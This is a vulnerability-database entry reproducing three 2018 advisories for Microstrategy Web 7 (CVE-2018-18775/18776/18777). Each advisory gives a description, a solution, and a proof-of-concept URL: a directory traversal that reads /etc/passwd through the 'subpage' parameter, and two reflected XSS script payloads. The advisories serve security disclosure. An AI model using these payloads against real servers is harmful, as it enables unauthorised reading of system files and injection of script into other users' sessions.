Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal

🗓️ 30 Oct 2018 00:00:00Reported by Rafael PedreroType

Vulnerabilities in Microstrategy Web

Reporter	Title	Published	Views	Family All 23
0day.today	Microstrategy Web 7 - Cross-Site Scripting / Directory Traversal Vulnerabilities	31 Oct 201800:00	–	zdt
CNVD	Microstrategy Web Cross-Site Scripting Vulnerability (CNVD-2018-23268)	2 Nov 201800:00	–	cnvd
CNVD	Microstrategy Web Cross-Site Scripting Vulnerability	2 Nov 201800:00	–	cnvd
CNVD	Microstrategy Web Directory Traversal Vulnerability	2 Nov 201800:00	–	cnvd
CVE	CVE-2018-18775	1 Nov 201817:00	–	cve
CVE	CVE-2018-18776	1 Nov 201817:00	–	cve
CVE	CVE-2018-18777	1 Nov 201817:00	–	cve
Cvelist	CVE-2018-18775	1 Nov 201817:00	–	cvelist
Cvelist	CVE-2018-18776	1 Nov 201817:00	–	cvelist
Cvelist	CVE-2018-18777	1 Nov 201817:00	–	cvelist

<!--
# Exploit Title: Path traversal vulnerability in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18777
# Category: webapps

1. Description

Directory traversal vulnerability in Microstrategy Web, version 7, in
"/WebMstr7/servlet/mstrWeb" (in the parameter subpage) allows remote
authenticated users to bypass intended SecurityManager restrictions and
list a parent directory via a /.. (slash dot dot) in a pathname used by a
web application.


2. Proof of Concept

http://X.X.X.X/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=../../../../../../../../etc/passwd

3. Solution:

The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: Unix
# CVE : CVE-2018-18775
# Category: webapps

1. Description

Microstrategy Web, version 7, does not sufficiently encode user-controlled
inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
Login.asp Msg parameter.


2. Proof of Concept

http://X.X.X.X/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=
"><script>alert("XSS");</script><"

3. Solution:

The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in Microstrategy Web version 7
# Date: 29-10-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: https://www.microstrategy.com
# Software Link: https://www.microstrategy.com
# Version: Microstrategy Web version 7
# Tested on: all
# CVE : CVE-2018-18776
# Category: webapps

1. Description

Microstrategy Web, version 7, does not sufficiently encode user-controlled
inputs, resulting in a Cross-Site Scripting (XSS) vulnerability via the
admin.asp ShowAll parameter.


2. Proof of Concept

http://X.X.X.X/microstrategy7/admin/admin.asp?ShowAll=
"><script>alert("XSS")</script><"&ShowAllServers=show

3. Solution:

The product is discontinued. Update to last version this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

30 Oct 2018 00:00Current

5.6Medium risk

Vulners AI Score5.6

CVSS 24.3

CVSS 36.1

EPSS0.69525